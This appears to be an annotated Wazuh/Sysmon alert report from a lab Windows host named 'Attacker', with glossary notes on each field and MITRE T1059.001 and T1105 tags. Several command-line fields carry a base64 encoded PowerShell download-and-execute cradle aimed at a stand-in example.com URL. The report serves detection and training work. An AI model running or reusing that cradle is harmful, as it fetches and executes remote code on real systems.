data.win.system.eventRecordID:  284053
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:42.441 ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ProcessId: 14008 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ParentProcessId: 14452 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:42.441
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:46.007+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:46.007+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534266.1474564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:44.1199096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284054
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:44.080 ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ProcessId: 14008 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rm1lhycc.bo2.ps1 CreationUtcTime: 2025-04-24 22:37:44.080 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:44.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rm1lhycc.bo2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:44.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:49.103+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:49.103+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534269.1477333
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:46.7468088Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284082
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:45.366 ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ProcessId: 11904 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ParentProcessId: 14008 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:45.366
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:49.122+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:49.122+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534269.1485404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:47.0408204Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284083
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:46.996 ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ProcessId: 11904 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bkyc1qor.00t.ps1 CreationUtcTime: 2025-04-24 22:37:46.996 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:46.996
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bkyc1qor.00t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:46.996
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:52.767+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:52.767+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534272.1488173
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:50.1585075Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284107
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

